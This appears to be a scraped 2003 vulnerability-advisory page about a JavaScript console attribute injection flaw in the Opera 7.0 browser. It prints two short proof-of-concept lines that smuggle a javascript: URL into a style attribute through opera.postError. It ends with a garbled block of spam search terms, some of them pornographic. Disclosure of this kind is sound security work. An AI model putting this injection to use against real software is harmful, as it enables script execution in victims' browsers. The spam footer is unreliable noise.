about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Opera JavaScript Console Attribute Injection Vulnerability


Title Opera JavaScript Console Attribute Injection Vulnerability
Published 2003-02-04-12:00AM
Updated 2003-02-05-04:54PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this vulnerability credited to GreyMagic Software.
Vulnerable  Opera Software Opera Web Browser 7.0 win32
Not Vulnerable  Opera Software Opera Web Browser 7.0 1win32
Code   The following proof of concepts were provided:
open("file://localhost/console.html","","");
opera.postError("http://"style="background-image:url('javascript:alert(location.href)')"");

open("file://localhost/console.html","","");
opera.postError("file://"style="background-image:url('javascript:alert(location.href)')".");

Proof of concept demonstrations are available at the following location:

http://security.greymagic.com/adv/gm003-op/
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 07:06:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Kisah boke View sexs Remote+Roo maxcpm.inf xceva.com. Boy vedio snaps sextoon vi www.18year includes/o maxcpm.inf web hackin windows ft addguest.h maxcpm.inf com_login. search/exp Www.xvideo Need www.fwgchi www20.com www.eho-li free sexy ponnmovies www.Female horde 2.2. www.cheape News+Searc Www.indian 3ft.cn Wwe.Com Lolow search/exp Nayandh zashly arab porn www.she911 Vulnerabil Crack Data View free Www.Dokhma Www.Saxygi www.uugw8. wwwxixx www.wzlwgg news for c maxcpm.inf ...3Fopti Neked sendmail 8